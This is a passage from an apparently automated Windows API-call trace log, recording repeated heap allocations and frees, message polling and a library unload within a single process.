lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0161.553] FreeLibrary (hLibModule=0x75c90000) returned 1 [0161.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0161.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0161.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0161.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0161.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0161.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.555] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0161.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0161.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.556] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0161.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0161.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0161.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0161.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0161.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0161.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0161.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0161.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0161.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0161.557] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0161.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0161.558] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0161.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0161.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0161.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0161.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0161.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0161.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0161.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0161.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0161.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1770 [0161.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0161.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0161.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda80 [0161.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0161.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0161.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0161.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0161.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0161.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0161.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0161.561] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0161.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0161.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0161.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0161.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0161.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0161.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0161.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0161.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0161.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.568] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.568] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd978 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0161.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.570] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0161.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 